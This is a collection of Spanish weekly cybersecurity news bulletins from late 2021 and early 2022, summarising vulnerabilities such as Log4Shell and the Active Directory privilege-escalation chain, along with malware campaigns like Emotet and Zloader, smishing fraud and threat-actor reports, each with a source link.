Fallo en la entrega de correo en servidores Microsoft Exchange on-premise Microsoft lanzaba el 2 de enero una solución de emergencia para corregir un fallo por el que se interrumpía la entrega de correo electrónico en los servidores Microsoft Exchange on-premise. Nos encontramos ante un fallo del “año 2022” en el motor de análisis antimalware FIP-FS, una herramienta que se habilitaba en 2013 en los servidores Exchange para proteger a los usuarios ante el correo malicioso. El investigador de seguridad Joseph Roosen indicaba que la causa estaba en que Microsoft usaba una variable int32 firmada para almacenar el valor de la fecha, variable que contaba con un máximo de 2.147.483.647. Las fechas de 2022 tienen un valor mínimo de 2.201.010.001, por lo que sobrepasan la cifra máxima que se puede almacenar, de forma que falla el motor de escaneo y no se puede enviar el correo. El parche de emergencia requiere intervención del usuario (se trata de un script que debe ejecutarse siguiendo unas instrucciones determinadas) y, desde Microsoft advierten que el proceso puede llevar un tiempo. Desde la firma, estarían también trabajando en una actualización que solucione de forma automática el problema. Más detalles: https://techcommunity.microsoft.com/t5/exchange-team-blog/email-stuck-in-exchange-on-premises-transport-queues/ba-p/3049447 Fallo de seguridad en Uber permite enviar correos desde sus servidores El investigador de seguridad Seif Elsallamy ha descubierto una vulnerabilidad en el sistema de correo empleado por Uber que podría permitir a un agente amenaza enviar emails suplantando la identidad de la compañía. La vulnerabilidad detectada estaría localizada en uno de los endpoints de correos de Uber, el cual se habría expuesto de forma pública y permitiría que un tercero pudiera inyectar código HTML, pudiendo enviar correos simulando ser Uber. El investigador envió al medio digital Bleeping Computer un correo que provenía de la dirección de correo noreply@uber.com, donde se observa un formulario donde se solicita al usuario la confirmación de los datos de su tarjeta de crédito, información que sería enviada más tarde al servidor controlado por Seif Elsallamy. Este correo no entró en la bandeja de spam por provenir de los servidores de Uber. El investigador reportó a Uber la vulnerabilidad a través del programada de recompensas de HackerOne, pero esta fue rechazada por requerir ingeniería social para poder ser explotada. Este problema no es la primera vez que se detecta, pues investigadores como Soufiane el Habti o Shiva Maharaj ya lo habrían reportado tiempo atrás. Asimismo, el investigador expone que, debido a la fuga de información que tuvo Uber en 2016, existen 57 millones de usuarios en riesgo que podrían recibir correos que simularan proceder de Uber. Por su parte Bleeping Computer también se habría comunicado con Uber, sin recibir respuesta por el momento. Toda la info: https://www.bleepingcomputer.com/news/security/uber-ignores-vulnerability-that-lets-you-send-any-email-from-ubercom/ Parche extraordinario para fallos en Windows Server Microsoft publicó un parche de actualizaciones extraordinario que buscaba resolver algunos errores reportados por usuarios de Windows Server. En concreto, algunos usuarios de Windows Server 2019 y 2012 R2 se estarían encontrando con problemas de lentitud excesiva o que derivaban en que los terminales se quedaran en negro. En algunos casos, además, podrían producirse fallos a la hora de acceder a los servidores mediante escritorio remoto. El parche para estas versiones no está disponible en Windows Update y tampoco se instalará de forma automática. En su lugar, los usuarios afectados deberán seguir las instrucciones proporcionadas por Microsoft en su publicación. Se espera que el resto de las versiones de Windows Server reciban parches similares en los próximos días. Para saber más: https://docs.microsoft.com/en-us/windows/release-health/windows-message-center#2772 Técnicas evasivas del malware Zloader Investigadores de CheckPoint han analizado las nuevas técnicas evasivas del malware bancario Zloader. En la nueva campaña analizada, que atribuyen al grupo MalSmoke y que indican estaría realizándose desde noviembre de 2021, la infección comienza con la instalación de Altera Software, una herramienta legítima de monitorización y administración remota para IT, y que se emplea para conseguir acceso inicial de manera sigilosa. De forma complementaria a la utilización de una herramienta legítima, los actores hacen uso de DLL maliciosas con una firma válida de Microsoft para evadir las detecciones. Para ello los actores aprovechan el fallo CVE-2013-3900, una vulnerabilidad conocida desde 2013 por Microsoft, cuyo parche viene deshabilitado por defecto y que permite a un atacante modificar ejecutables firmados añadiendo código malicioso sin invalidar la firma digital. Todos los detalles: https://research.checkpoint.com/2022/can-you-trust-a-files-digital-signature-new-zloader-campaign-exploits-microsofts-signature-verification-putting-users-at-risk/ Elephant Beetle: grupo con motivaciones financieras El equipo de respuesta a incidentes de Sygnia han publicado un artículo donde exponen el análisis de Elephant Beetle, un grupo con motivaciones financieras que estaría atentando contra múltiples compañías del sector en Latinoamérica, y al que llevarían siguiendo durante dos años. También clasificado como TG2003, este grupo dedica largos periodos de tiempo en analizar a su víctima, además de su sistema de transferencias, pasando desapercibido por los sistemas de seguridad mediante la imitación de paquetes legítimos y empleando para ello un arsenal de más de 80 herramientas propias. Como vector de entrada predilecto, Elephant Beetle estaría aprovechando aplicaciones Java legítimas desplegadas en sistemas Linux. Desde Sygnia destacan la explotación de vulnerabilidades antiguas sin parchear como: CVE-2017-1000486 (Primetek Primeface), CVE-2015-7450 (WebSphere), CVE-2010-5326 o EDB-ID-24963 (SAP NetWeaver). Una vez estudiada la víctima, crea transacciones fraudulentas de pequeñas cantidades que imitarían los movimientos legítimos de la compañía. Aunque la atribución todavía no es clara, desde Sygnia explican que, tras múltiples análisis de incidentes protagonizados por Elephant Beetle donde han localizado patrones como la palabra “ELEPHANTE” o múltiples C2 que estaban localizados en México, podría tener conexión con países hispanohablantes, más concretamente con Latinoamérica, pudiendo ser México la zona de procedencia. Más info: https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia- Elephant Beetle_Jan2022.pdf
7 de enero de 2022
Boletín semanal ciberseguridad 28-31 diciembre
Campaña de smishing suplantando a MRW y Sending que utiliza datos de pedidos reales Numerosos usuarios de Twitter están denunciando una campaña de smishing en la que se estaría suplantando a las empresas de logística Sending y MRW. Las primeras denuncias se producían el día 26 de diciembre, cuando clientes de marcas como Pampling, Druni o Primor informaban que Sending, el proveedor de mensajería de éstas, habría sufrido un incidente y estarían enviándose SMS en nombre de Sending solicitando datos bancarios para poder completar el envío de un pedido. Lo relevante de este caso es que los SMS recibidos hacían referencia a pedidos reales que se habían realizado, según denuncian los propios usuarios, motivo por el que se habría planteado una posible fuga de información en Sending, la cual se estaría empleando por los atacantes para dotar de credibilidad a los SMS enviados. En los SMS se incluye información personal como el nombre y el tipo de pedido, además de una URL donde se hace referencia a un dominio ilegítimo “envios-sending[.]com”, junto con un parámetro creado para que el phishing lo pueda visualizar únicamente el propio usuario. Al acceder al enlace, se puede ver ya un caso de phishing donde se solicitan datos bancarios al usuario para formalizar el envío. En las últimas horas de la tarde del lunes, comenzaban también las denuncias de casos contra MRW por el mismo fraude, lo que forzaba a la empresa a lanzar un aviso a sus usuarios alertando de la importancia de no introducir datos bancarios que se soliciten vía SMS. En este caso, al igual que ocurría con Sending, se empleaba también un dominio ilegítimo “envios-mrw[.]com”. Desde el principio de esta campaña los usuarios en redes sociales denunciaron un “hackeo” a estas empresas, siendo esta hipótesis confirmada en un comunicado emitido desde MRW el día 29 de diciembre, donde señalaban que habrían notificado una brecha de seguridad ante la Agencia Española de Protección de Datos, enunciando que se habrían visto afectados datos de carácter identificativo y de contacto de los destinatarios. Por su parte desde Sending advirtieron a sus usuarios acerca de la brecha de seguridad el mismo día 27 mediante un SMS. Toda la información: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/148762_sms-mrw-smishing.pdf Vulnerabilidades en cifrados de almacenamiento de DataVault Investigadores de seguridad han informado acerca de dos nuevas vulnerabilidades en el software DataVault, y sus sistemas derivados, empleados para el cifrado de datos en soluciones de almacenamiento de WD (propietario de SanDisk), Sony o Lexar. Uno de los fallos, se debe a la utilización de un hash criptográfico unidireccional con una clave salt predecible, lo que los convierte en vulnerables a ataques de diccionario (CVE-2021-36750). El software también emplea un hash de contraseñas con un esfuerzo computacional insuficiente, lo que permitiría a un atacante obtener las contraseñas del usuario mediante ataques de fuerza bruta, exponiendo así los datos a un acceso no autorizado (CVE-2021-36751). Ambos fallos en la función de derivación de claves se han resuelto en la versión de DataVault 7.2. por lo que se recomienda la actualización inmediata del software a dicha versión. Más información: https://pretalx.c3voc.de/rc3-2021-r3s/talk/QMYGR3/ Avisos de exposición de contraseñas master de usuarios de LastPass Varios usuarios estarían reportando en las últimas horas un posible compromiso de su contraseña principal (master password) del gestor de contraseñas LastPass. Las denuncias se producen tras llegarles un aviso de bloqueo de un acceso no autorizado a su cuenta de LastPass desde una ubicación desconocida. De acuerdo con la compañía, no se han encontrado indicios de la exposición de sus datos, por lo que estos bloqueos se habrían realizado según indican, al haber reutilizado los usuarios estas credenciales en otros servicios, de forma que esas podrían estar expuestas a raíz de su utilización en esos otros servicios, y serían susceptibles ser utilizadas en ataques de credential stuffing. Sin embargo, esta justificación de LastPass no encaja, según dicen algunos usuarios, con los reportes que indican habrían vuelto a recibir tras configurar nuevas contraseñas únicas. También se plantea como posibilidad, que los avisos hayan sido remitidos por error. Se desconoce, por tanto, si ha existido o no algún tipo de exposición de credenciales y el vector por el que se podrían haber expuesto. Por su parte, el investigador Bob Diachenko habría revisado si algunos de los usuarios que han denunciado haber recibido los avisos se encontraba incluido entre los afectados por malware como RedLine, descartando también esta opción. Desde LastPass han recomendado la activación del doble factor autenticación a fin de evitar accesos no autorizados. Este incidente, pone en evidencia la importancia de no reutilizar en ningún momento contraseñas entre servicios, y menos cuando se trata de la contraseña principal de un gestor de contraseñas. Toda la información: https://www.bleepingcomputer.com/news/security/lastpass-users-warned-their-master-passwords-are-compromised/ Nueva vulnerabilidad de ejecución arbitraria de código en Log4j Esta semana, el investigador de seguridad Yaniv Nizry volvía a sembrar el caos con una publicación en Twitter donde alertaba del descubrimiento de una nueva vulnerabilidad de ejecución remota de código en Log4j, que afectaría a la última versión 2.17.0. Algunos investigadores destacados como Kevin Beaumont invitaban a mantener la calma hasta que se conociesen más detalles y, a los pocos minutos de la publicación alertaban de la detección de supuestos exploits para este nuevo fallo que no eran sino troyanos; práctica habitual cuando se informa de fallos mediáticos como el actual. Unas horas más tarde, el investigador Marc Rogers hacía ya público el CVE asociado a esta nueva vulnerabilidad, CVE-2021-44832, e indicaba, asimismo, que para la explotación de este fallo se requiere un cambio previo de las condiciones predeterminadas, lo que complica su explotación. Esta misma idea era compartida inmediatamente por otros investigadores de renombre como Will Dorman, quien ayer, tras hacerse pública la investigación de Yaniv Nizry criticaba a Checkmarx, la firma del investigador, por crear una situación de alarma con este nuevo fallo. La explotación de este requiere que el atacante cuente con permisos de administrador en el propio sistema que quiere comprometer, puesto que, para poder explotarlo, debe poder modificar previamente el archivo de configuración de logging. Esta idea ya de por si no tiene mucho sentido, pero algunos usuarios insisten en apuntar a la figura del insider, que modifique el archivo, como posible riesgo (si bien es cierto que, de existir un insider, existen otros riesgos mayores). Dicho lo anterior, estamos por tanto ante una vulnerabilidad de ejecución arbitraria de código, no de ejecución remota como se pensaba inicialmente, y habría recibido una criticidad moderada, con un CVSSv3 de 6.6. El fallo en concreto se debe a la falta de controles adicionales en el acceso JDNI en Log4j. Apache ha lanzado ya la versión 2.17.1 para corregir el fallo. A pesar de la auto atribución del fallo por parte de Yaniv Nizry, desde Apache no han incluido su nombre en los créditos de la vulnerabilidad. Descubre más: https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44832
3 de enero de 2022
Boletín semanal ciberseguridad 18-27 de diciembre
Vulnerabilidad Log4Shell (actualización) A lo largo de esta semana han continuado conociéndose más novedades y repercusión relacionadas con la vulnerabilidad conocida como Log4Shell. En primer lugar, cabe destacar la detección de una nueva vulnerabilidad que afecta a Log4j2 en versiones 2.0-alpha1 a 2.16.0, y que podría permitir una denegación de servicio. La corrección de esta vulnerabilidad, catalogada como CVE-2021-45105 CVSSv3 7.5, ha dado lugar al lanzamiento de la versión 2.17.0. Por otro lado, se han conocido nuevas explotaciones activas de Log4Shell por parte de los ransomware TellYouThePass y Conti. También se ha detectado su explotación para la distribución de los troyanos Dridex y Meterpreter. Cabe destacar la publicación de un estudio llevado a cabo por Netlab, donde exponen los resultados observados en sus honeypots, exponiendo el hecho de que habrían detectado muestras de más de 30 familias distintas de malware distribuyéndose desde direcciones IP de más de 54 países distintos, destacándose muestras de mineros como Kinsing y Xmrig, así como binarios de familias como Dofloo, Tsunami (aka Mushtik) o la botnet Mirai. En relación a la explotación activa de la vulnerabilidad, el Ministerio de Defensa de Bélgica ha confirmado esta semana haber sufrido un ciberataque, el cual habría tenido como vector inicial la explotación de Log4Shell, si bien por el momento se desconoce la atribución de este. Finalmente, esta semana el equipo de Blumira ha informado acerca de un nuevo vector de ataque que permitiría explotar la vulnerabilidad de Log4Shell en servidores de forma local empleando una conexión Websocket de JavaScript, aunque por el momento no se ha detectado su explotación activa. En otro orden de cosas, desde la alianza conocida como Five Eyes, formada por agencias gubernamentales de Australia, Canadá, Nueva Zelanda, Reino Unido y Estados Unidos, han publicado un aviso de seguridad conjunto donde incluyen una serie de recomendaciones para los afectados por esta vulnerabilidad. También la CISA estadounidense ha lanzado “log4j-scanner” una nueva herramienta para escanear e identificar servicios web vulnerables a los dos fallos de ejecución remota de código identificados en Log4j (CVE-2021-44228 y CVE-2021-45046). En relación a las agencias gubernamentales, esta semana se ha conocido que el Ministerio de Industria y Tecnología de la Información (MIIT) de China habría suspendido durante seis meses su acuerdo de colaboración con Alibaba Cloud Computing en materia de ciberamenazas y plataformas de intercambio de información, el motivo es que fueron investigadores de Alibaba los autores del descubrimiento de la vulnerabilidad Log4j (CVE-2021-44882), y no habrían informado de las mismas al regulador de las telecomunicaciones chino de forma previa a su divulgación a Apache. Toda la información: https://logging.apache.org/log4j/2.x/download.html Meta toma acciones contra empresas de vigilancia bajo demanda Meta, la compañía matriz de Facebook, ha anunciado que tras meses de investigación ha eliminado siete compañías dedicadas a la industria de la vigilancia bajo demanda (“surveillance-for-hire”) de sus plataformas por apuntar contra víctimas de más de 100 países, con el objetivo de recopilar información, manipular y comprometer sus dispositivos y cuentas. Esta actividad habría impactado contra aproximadamente 50.000 usuarios que han sido notificados de actividades maliciosas. Las compañías eliminadas proceden de diferentes países como China, Israel, India y Macedonia del Norte, y estarían operando contra sus objetivos en tres fases: el reconocimiento, mediante software automatizado, el compromiso, en la que buscan ganarse la confianza de sus víctimas, y, la explotación, a través de la distribución de phishing con el objetivo de conseguir credenciales. Desde Meta inciden en que, aunque habitualmente se suelen atajar estas campañas en la fase de explotación, es fundamental interrumpir el ciclo de vida del ataque en sus primeras fases para evitar que posteriormente se lleguen a comprometer dispositivos y cuentas de usuarios. Dada la gravedad de sus infracciones, Meta ha reportado que además de eliminar estas empresas de sus plataformas, han bloqueado su infraestructura relacionada, han emitido notificaciones de ceses y desistimiento, notificándoles que su actividad no tiene cabida en las plataformas de la firma, y han compartido sus hallazgos con investigadores, otras plataformas y autoridades para que tomen las medidas oportunas. Descubre más: https://media.telefonicatech.com/telefonicatech/uploads/2021/1/148537_Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf Google publica un análisis en profundidad del exploit FORCEDENTRY de NSO Recientemente, el equipo Project Zero de Google ha publicado un análisis en profundidad del exploit FORCEDENTRY de NSO Group, al que consideran uno de los exploits más sofisticados que han analizado desde este equipo, poniendo a las herramientas de NSO al nivel de sofisticación de grupos de Amenazas Persistentes Avanzadas (APTs) apoyados por Estados. La muestra, analizada en colaboración con el equipo de Ingeniería y Arquitectura de Seguridad (SEAR) de Apple, ha sido distribuida, a lo largo del año, de manera selectiva contra activistas, disidentes y periodistas de diferentes regiones. FORCEDENTRY utiliza una técnica de zero-click o no interacción, lo que significa que las víctimas no necesitan acceder a un enlace, ni conceder permisos específicos para que el ataque avance. Además, este exploit utiliza una serie de tácticas contra la plataforma iMessage de Apple para eludir las protecciones del dispositivo, tomar el control e instalar Pegasus, el conocido spyware de NSO. La vulnerabilidad aprovechada por este exploit (CVE-2021-30860 CVSSv3 7.8) se encuentra corregida desde septiembre de 2021, en la versión de iOS 14.8. Este mismo exploit ha sido observado por Citizen Lab siendo utilizado en un ataque contra un activista saudita en el que habrían utilizado Pegasus junto con Predator, un software desarrollado por Cytrox, una de las compañías de “vigilancia bajo demanda” reportadas por el equipo de Meta y que han sido eliminadas de sus plataformas. Más información: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html Campañas de encuestas con regalos reportan 80 millones mensuales a actores maliciosos El equipo de investigadores de Group-IB ha publicado una investigación en la que analiza que el cibercrimen genera, aproximadamente, 80 millones de dólares al mes como consecuencia de los esquemas de fraude empleando encuestas con regalos, con el fin de recolectar información personal y bancaria. Actores maliciosos captan a sus víctimas utilizando publicidad en sitios web, SMS, correos y/o notificaciones emergentes bajo el pretexto de ganar un premio de una conocida marca mediante la participación en una encuesta. Entre lo característico de estas campañas es que la infraestructura empleada permite a actores maliciosos mostrar contenido diferente a distintos usuarios, en función de ciertos parámetros. Esto es debido a que se realizan varias redirecciones en el momento de acceder a estos enlaces, durante las cuales se recopila información del usuario que finalizará en mostrar contenido adaptado a la víctima. Asimismo, el enlace final está personalizado para el usuario concreto, siendo accesible solo una vez, complicando la detección de estos sitios maliciosos. En último lugar, se destaca que estas campañas se dirigen a más de 90 países, siendo Europa la región más afectada y que el número de empresas suplantadas supera las 120. Toda la info: https://www.group-ib.com/media/target-links-2021/
27 de diciembre de 2021
Boletín semanal de ciberseguridad 11 – 17 diciembre
Nueva campaña de distribución del troyano bancario Anubis Investigadores de Lookout han informado sobre una campaña maliciosa en la que se distribuye una nueva versión del troyano bancario Anubis ofuscado en una aplicación móvil de Android que simula ser de la compañía francesa de telecomunicaciones Orange. Actores maliciosos habrían fijado como objetivos a un total de 394 aplicaciones financieras como bancos, billeteras de criptomonedas y plataformas de pago virtual con el objetivo de exfiltrar las credenciales de estos servicios. Anubis es un troyano bancario conocido desde el 2016 cuyo desarrollo no se ha detenido en ningún momento. Una vez instalado en el dispositivo de la víctima, su funcionamiento pasa por mostrar formularios de inicio de sesión fraudulentos de las aplicaciones que se fijan como objetivo para comprometer las credenciales del usuario, así como también cuenta con otras funciones como, grabación de pantalla y sonido, envío y lectura de SMS o escaneo del dispositivo en busca de archivos de interés para exfiltrar. Según la investigación, la distribución de la aplicación de Orange fraudulenta se estaría llevando a cabo a través de sitios web maliciosos, mensajes directos en redes sociales, smishing y publicaciones en foros. Más info: https://www.bleepingcomputer.com/news/security/anubis-android-malware-returns-to-target-394-financial-apps/ Vulnerabilidad Log4Shell El pasado viernes 10 de diciembre se dio a conocer una vulnerabilidad 0-day en Apache Log4j, catalogada como CVE-2021-44228. Se trata de una vulnerabilidad que afecta a la librería de registro Java Apache Log4j 2, utilizada por multíplices aplicaciones de empresas en todo el mundo, al tratarse de una librería de código abierto. La explotación de este fallo permitiría la ejecución de código malicioso en servidores o clientes de aplicaciones. El riesgo por tanto provenía de diferentes factores que se unieron: El día 9, el día anterior a la publicación de la versión corregida, ya había disponible un exploit para esta vulnerabilidad. Su explotación es sencilla. Log4j es utilizada a nivel mundial en muchas aplicaciones web. Esta vulnerabilidad se corregía inicialmente en Log4j 2.15.0. Sin embargo, unos días más tarde se conocía una segunda vulnerabilidad catalogada como CVE-2021-45046, derivada de una incompleta corrección de la vulnerabilidad Log4Shell y se lanzaba la versión Log4j 2.16.0 para corregir definitivamente el fallo. Inicialmente esta segunda vulnerabilidad se catalogaba como de denegación de servicio y se le otorgaba un CVSSv3 de 3.7 pero, en las últimas horas, se ha modificado su riesgo a 9 y su categoría a ejecución remota de código. Tras la publicación de esta vulnerabilidad, se ha ido conociendo la existencia de diversos intentos de explotación del fallo como el intento de infección con botnets para la instalación de mineros de criptomoneda, su uso para distribuir ransomware (Khonsari) o la distribución del troyano StealthLoader. Es destacable de hecho, que se han encontrado evidencias de su explotación previa al día 9 de diciembre, si bien, la explotación masiva habría dado lugar con la publicación del exploit. En cuanto a los productos afectados, el listado completo aún no está definido. A lo largo de la semana se han ido conociendo los productos para los que se detectaba afectación poco a poco, siendo el listado más completo el publicado por el Nationaal Cyber Security Centrum (NCSC-NL). Más información: https://logging.apache.org/log4j/2.x/security.html Emotet vuelve a utilizar Cobalt Strike Investigadores de seguridad avisaron en el día de ayer que, tras un breve parón en las operaciones de Emotet la semana pasada, los actores amenaza han comenzado, una vez más, a instalar beacons de Cobalt Strike en los dispositivos infectados con Emotet. Según ha informado el investigador de seguridad Joseph Roosen, del grupo Cryptolaemus especializado en esta amenaza, Emotet está descargando los módulos de Cobalt Strike directamente desde su servidor de Command & Control para posteriormente ejecutarlo en los dispositivos infectados. De esta forma, los atacantes obtienen acceso inmediato a las redes vulneradas. Para ello, los agentes amenaza utilizan un archivos jQuery maliciosos para comunicarse con el C2 y recibir nuevas instrucciones. A pesar de ser un archivo malicioso, la mayor parte del código es legítimo, haciendo más sencillo evadir los sistemas de seguridad de la víctima. Debido al incremento de beacons de Cobalt Strike distribuidos a equipos ya infectados, se prevé un incremento en los incidentes de seguridad sufridos por las compañías durante los próximos meses. Todos los detalles: https://www.bleepingcomputer.com/news/security/emotet-starts-dropping-cobalt-strike-again-for-faster-attacks/ Nuevos exploits para vulnerabilidades ya corregidas de Microsoft En las últimas horas se habría detectado la existencia de nuevos exploits para varias vulnerabilidades que se corregían en boletines previos de Microsoft: CVE-2021-42287 y CVE-2021-42278. El primero de los fallos, CVE-2021-42287 CVSSv3 de 8.8 es una vulnerabilidad de elevación de privilegios en los servicios de dominio de Active Directory, corregida por Microsoft en su boletín de seguridad del pasado mes de mayo. Este fallo según indica la propia Microsoft afecta al Certificado de Atributos de Privilegio (PAC) de Kerberos y permite a un atacante hacerse pasar por los controladores de dominio. Para explotarla, una cuenta de dominio comprometida podría hacer que el Centro de Distribución de Claves (KDC) creara un ticket de servicio (ST) con un nivel de privilegio superior al de la cuenta comprometida. Un atacante logra esto impidiendo que el KDC identifique a qué cuenta corresponde el ST de mayor privilegio. Si este fallo se encadena con otra vulnerabilidad corregida en el boletín de noviembre, la CVE-2021-42278 CVSSv3 de 8.8, permitiría a los atacantes alcanzar derechos de administrador de dominio en cualquier entorno de Active Directory. La cadena de explotación es extremadamente fácil de aprovechar, permitiendo a los adversarios elevar sus privilegios incluso sin acceso a la cuenta de usuario estándar subyacente. Hay una actualización disponible para todos los sistemas operativos compatibles. En cualquier caso la mitigación pasa por parchear los controladores de dominio afectados implementando el parche de Microsoft del 14/11/2021 (KB5008602) que soluciona el problema de la confusión del PAC, así como el problema de S4U2self creado por el parche anterior (KB5008380). No obstante, algunas fuentes mencionan que el parche KB5008602 sólo es efectivo en Windows Server 2019 por lo que es recomendable consultar la siguiente guía con el fin de mitigar el problema en otras versiones del producto. Actualmente no se conoce que haya explotación activa de estos fallos, pero sí que observamos que existe un post que explica cómo se podría explotar este problema, así como una herramienta en Github que escanea y explota estas vulnerabilidades. Adicionalmente, en redes sociales se empiezan a observar menciones sobre la posible combinación de estos fallos con la vulnerabilidad crítica Log4j. Más info: https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html Vulnerabilidades en dispositivos Lenovo Investigadores de seguridad de NCC Group han descubierto dos nuevas vulnerabilidades en el componente IMController presente en múltiples dispositivos Lenovo, incluidos portátiles Yoga y ThinkPad, y que estaría afectado a todas las versiones de Lenovo System Interface Foundation anteriores a 1.1.20.3. Lenovo System Interface Foundation es un sistema que se ejecuta con privilegios SYSTEM y que ayuda a los dispositivos Lenovo a comunicarse con aplicaciones universales, proporcionando al usuario funciones como la optimización del sistema y la actualización de controladores, entre otras. Si este se desactiva, las aplicaciones de Lenovo dejarían de funcionar correctamente. Las nuevas vulnerabilidades identificadas (CVE-2021-3922 / 3969 CVSSv3 7.1) podrían permitir que un usuario malintencionado pudiera ejecutar comandos con privilegios de administrador. La primera de ellas es una vulnerabilidad del tipo race condition que permitiría interactuar con el proceso secundario “Pipe” de IMController. El segundo sería un fallo del tipo TOCTOU (time-of-check to time-of-use) que, de ser aprovechado, podría permitir escalar privilegios en el dispositivo vulnerable. NCC Group avisaba a Lenovo de ambos fallos el pasado mes de octubre, emitiéndose finalmente actualizaciones el día 14 de diciembre que solventarían ambos errores, por lo que se recomienda actualizar IMController a la versión 1.1.20.3. Detalles aquí: https://research.nccgroup.com/2021/12/15/technical-advisory-lenovo-imcontroller-local-privilege-escalation-cve-2021-3922-cve-2021-3969/
17 de diciembre de 2021
Boletín semanal de ciberseguridad 4 – 10 diciembre
El gobierno catalán sufre ataque de DDoS Según el comunicado emitido desde la Generalitat, el Centre de Telecomunicacions i Tecnologies de la Informació (CTTI) detectó el pasado viernes un ciberataque que comprometió más de 2.000 aplicaciones informáticas del organismo durante aproximadamente 3 horas. En concreto, el ataque sufrido fue de denegación de servicio (DDoS), consistente en el colapso de los servicios mediante el aumento del volumen de tráfico para que los servidores incrementen su tiempo de procesamiento. En relación a su origen, la Generalitat ha indicado que las primeras investigaciones señalan que podría tratarse de un ataque contratado a través de la dark web, aunque por el momento no hay ninguna confirmación al respecto. Varias páginas web y servicios dependientes de la Generalitat como La Meva Salut se vieron afectadas y también experimentaron problemas técnicos otros servicios como la televisión catalana, TV3 o Catalunya Ràdio. Finalmente, en un plazo de no más de tres horas, la situación quedó controlada y se retomó la normalidad tal y como ya ha asegurado el propio organismo. Más detalles: https://govern.cat/salapremsa/notes-premsa/416324/nota Emotet: nuevas campañas que utilizan Trickbot y Cobalt Strike en sus infecciones Investigadores de CheckPoint han publicado un análisis sobre el resurgimiento de Emotet. Según los investigadores, en las nuevas campañas se ha observado el uso de Trickbot como vector de entrada, uno de los malware más utilizados, que en los últimos meses habría infectado hasta 140.000 víctimas en todo el mundo, con más de 200 campañas y miles de direcciones IP en dispositivos comprometidos. Trickbot, al igual que Emotet, se usa habitualmente para distribuir finalmente ransomware, como Ryuk o Conti. Desde CheckPoint analizan estas nuevas campañas donde se ha observado que Trickbot estaría distribuyendo Emotet, del cual señalan que habría mejorado sus capacidades con nuevas herramientas como: el uso de criptografía de curva elíptica en lugar de RSA, mejoras en sus métodos de aplanamiento del flujo de control o añadiendo a la infección inicial el uso de paquetes maliciosos de instalación de aplicaciones de Windows que imitan software legítimo. Por otro lado, cabe también destacar que investigadores de Cryptolaemus han detectado en los últimos días que Emotet estaría directamente instalando Cobalt Strike en los dispositivos comprometidos, lo que aceleraría el proceso de infección dando acceso inmediato a movimientos laterales, robo de datos o distribución de ransomware. Toda la info: https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/ Vulnerabilidad RCE en Windows 10 y 11 Investigadores de seguridad de Positive Security han descubierto una vulnerabilidad drive-by de ejecución remota de código en Windows 10 y 11. Este fallo se produce a través de Internet Explorer 11/Edge Legacy, el navegador predeterminado en la mayoría de los dispositivos Windows, y se desencadena a través de una inyección de argumentos en el URI handler por defecto de Windows ms-officecmd. Un atacante podría explotar esta vulnerabilidad a través de un sitio web malicioso que permita realizar una redirección a una URL creada por ms-officecmd. Cabe destacar que, para que el exploit funcione, Microsoft Teams debe estar instalado en el sistema. Desde Positive Security informaban del fallo a Microsoft el pasado mes de marzo, quien la descartaba en un primer momento. Sin embargo, tras la apelación de los investigadores pasaba ya a considerarse como un fallo crítico. En agosto, Microsoft lo corregía parcialmente, permitiéndose aún la inyección de argumentos. Todos los detalles: https://positive.security/blog/ms-officecmd-rce Vulnerabilidad 0-day en Apache Log4j Se ha publicado una PoC para una vulnerabilidad 0-day, recientemente asignada como CVE-2021-44228, de ejecución de código en Apache Log4j, una librería de código abierto desarrollada en Java que permite a los desarrolladores de software guardar y escribir mensajes de registro que es utilizada en múltiples aplicaciones de compañías en todo el mundo. Este fallo permitiría ejecutar código malicioso en servidores o clientes de aplicaciones, siendo entre una de las más destacadas la que ejecutan versiones de Java del videojuego Minecraft, manipulando los mensajes de registro e, incluso, los mensajes introducidos en el chat del propio juego. Según los investigadores de LunaSec, las versiones de Java superiores a la 6u211, 7u201, 8u191 y 11.0.1 no están afectadas por este vector de ataque. Además, desde LunaSec indican que los servicios cloud de Steam y Apple iCloud también se han visto afectados. En último lugar, señalar que las versiones de apache log4j afectadas son la 2.0 hasta la 2.14.1, corrigiéndose este fallo de seguridad en la versión 2.15.0. Descubre más información: https://www.lunasec.io/docs/blog/log4j-zero-day/ Análisis sobre el actor estatal ruso Nobelium Investigadores de Mandiant han publicado un artículo detallando operaciones llevadas cabo por Nobelium, actor asociado al Servicio de Inteligencia Exterior Ruso (SVR). Desde Mandiant señalan que entre las tácticas empleadas por este grupo para obtener el acceso inicial en la infraestructura de la víctima destacan: el uso de credenciales comprometidas en campañas de malware anteriores donde se empleó el stealer CRYPTBOT, compromiso de los proveedores de servicios en la nube (CSP) y abuso de las notificaciones push (MFA). Una vez conseguido el primer acceso, el actor intenta conseguir persistencia y escalar privilegios mediante el uso del protocolo RDP, empleando WMI y PowerShell para distribuir el backdoor BEACON en la red de la víctima. Este backdoor fue empleado más tarde para instalar una nueva herramienta a la que han denominado CEELOADER, un downloader que comunicaría vía HTTP con el C2 de Nobelium, y el cual distribuye Cobalt Strike. Además, desde Mandiant destacan el uso de servicios de proxies de IPs residenciales para autenticarse en los sistemas de la víctima y el uso de WordPress comprometidos donde alojan los payloads que darán lugar a la segunda etapa de la cadena de infección. Asimismo, desde la Agencia Nacional Francesa de Ciberseguridad (ANSSI) han emitido un comunicado donde especifican que desde el pasado mes de febrero se habrían detectado múltiples campañas contra organizaciones francesas provenientes del actor ruso. Más info: https://www.mandiant.com/resources/russian-targeting-gov-business
10 de diciembre de 2021
Boletín semanal de ciberseguridad 27 de noviembre - 3 diciembre
